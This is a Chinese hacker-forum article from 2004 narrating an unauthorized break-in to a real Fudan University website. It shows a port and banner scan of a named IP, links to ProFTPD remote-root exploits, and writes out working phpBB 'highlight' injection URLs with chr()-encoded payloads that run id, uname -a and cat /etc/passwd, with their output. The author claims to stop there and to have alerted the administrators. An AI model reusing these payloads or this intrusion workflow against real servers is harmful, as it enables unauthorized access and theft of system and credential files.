 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 渗透复旦大学 | |||||
作者:cnbird 文章来源:CnXHacker.Net 点击数: 更新时间:2004-12-15  |
|||||
|
前言: 希望大家转载我的文章,不过再您转载前请写明出处和我的QQ:550669 要求不高吧。。。。^^ 起因: ①今天在学校没有事情做,正当无聊的时候我们宿舍的朋友告诉我一个主页,是复旦大学的,看看吧。。。。本来对大学没什么感觉,可也不能不给同学面子啊。 入侵步骤: 登陆到主页上,www.fd100.fudan.edu.cn看了看结构是php结构的,测试一下安全吧,看了半天基本上没有什么漏洞,大学的主页安全性就是高。。。。 拿出流光扫扫看吧,出现了以下的结果 202.120.224.100 -------------------------------------------------------------------------------- 端口扫描 80(HTTP) 21(FTP Control) 22(SSH) -------------------------------------------------------------------------------- FTP扫描 FTP版本信息: ProFTPD 1.2.9 Server (www.fd100.fudan.edu.cn) [www.fd100.fudan.edu.cn] -------------------------------------------------------------------------------- CGI扫描 WEB版本信息: Apache/2.0.52 (Trustix Secure Linux/Linux) WWW 标题: 复旦百年校庆特别网站 -------------------------------------------------------------------------------- MISC SSH Version : SSH-2.0-OpenSSH_3.8p1 -------------------------------------------------------------------------------- Plugins IIS 5.0 WEBDAV Exploit 误报多多啊。出来了一个IIS 5.0 WEBDAV Exploit 我晕死。。。。 从上面的结果得到了很多重要的信息,例如ssh的版本号啊,相信大家都能看懂我就不罗嗦了。 ssh是2。0的没有什么漏洞了,ProFTPD 1.2.9 Server 的有几个溢出程序,因为再学校的原因,没有办法编译所以就没有试,大家有兴趣的话可以去试试,下面我给出地址 有2个漏洞,点击就可以下载了 _blank>ProFTPd 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit _blank>ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit ②开来从系统入侵方面没有办法了,从web入手吧,看看了php注入的,没有漏洞,错误都转到一个空白页,看来这条路也走不通了,再看看吧,无意间发现了论坛2个字,进去看看吧,这时候我眼澄的大大的,怎么这么熟悉呢???往下一看,哈哈偷乐了,是phpbb 2.0.6的,最近这个论坛出了很多大的漏洞,先简单的试了一下,首先来到了 http://www.fd100.fudan.edu.cn/forum/viewtopic.php?t=112,先简单的测试一下看看有没有漏洞吧,然后我提交 http://www.fd100.fudan.edu.cn/forum/viewtopic.php?t=15&highlight=%2527%252esystem(chr(105)%252echr(100))%252e%2527 看到了什么?不错,uid=109(httpd) gid=109(httpd) groups=109(httpd) 如图1: 呵呵看来能入侵了,首先我先来说说这个漏洞的原理, phpBB是一款使用多种模块扩展的流行的论坛系统。 phpBB 'viewtopic.php'对用户提交的参数缺少充分过滤,远程攻击者可以利用这个漏洞增加任意拥有管理权限的用户帐户。 'viewtopic.php'对'highlight'参数缺少充分检查,提交使用多个char()函数的SQL查询,可在系统中增加管理员权限的用户帐户。 另外附件模块对用户提交给"UPLOAD_DIR"字段数据缺少充分过滤,提交包含多个'../'字符的数据,可绕过WEB ROOT限制,以进程权限查看系统文件内容。 好了,相信大家明白原理了,我们继续啊,对了再说几句,其实这个漏洞有利用程序的,我这里有3个版本,可以再我的blog找到,因为学校的原因不愿意再装perl解释器了,所以就手工测试了。 继续提交http://www.fd100.fudan.edu.cn/forum/viewtopic.php?t=15&highlight=%2527%252esystem(chr(117)%252echr(110)%252echr(97)%252echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252e%2527 得到了Linux www.fd100.fudan.edu.cn 2.4.27-3trsmp #1 SMP Tue Sep 21 16:31:10 CEST 2004 i686 unknown unknown GNU/Linux 如图2  然后继续提交http://www.fd100.fudan.edu.cn/forum/viewtopic.php?t=15&highlight=%2527%252esystem(chr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(47)%252echr(101)%252echr(116)%252echr(99)%252echr(47)%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(119)%252echr(100))%252e%2527 暴露出了/etc/passwd的文件,到这里不要再演示了,这个是比较出名的大学的服务器,我怕怕就不继续深入了。 如图  这么严重的事赶紧给网管发个信息吧。。。让他补上漏洞,email找不到。。只好写到论坛上了。到现在漏洞还没有补上呢,希望大家不要搞破坏,不然后果自己负责。。。 如图:  后记:这只是一个简单漏洞的利用,由此可以看出中国的安全水平,希望个个管理员重视起来。既然我能渗透进去,我就能拿到root,然后随便乱搞,当然我是不会这样做的。 其实我说上面的话我只是想说明国内的网络管理人员要重视安全,不要让国外的黑客有可乘之机。好了,希望大家和我讨论技术我的QQ是550669 |
|||||
| 文章录入:IceRiver 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 对kappa官方网站的渗透经过 渗透冰兰黑客基地 内网渗透——如何打开突破口 内网渗透----如何打开突破口 网站渗透率已达85.6% 被篡改 防护先行之在渗透测试中的攻 为“网上银行”筑安全屏障 复 关于内网渗透我的一点思路 巧用嗅探 玩“渗透” 渗透知名公司内部网络 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
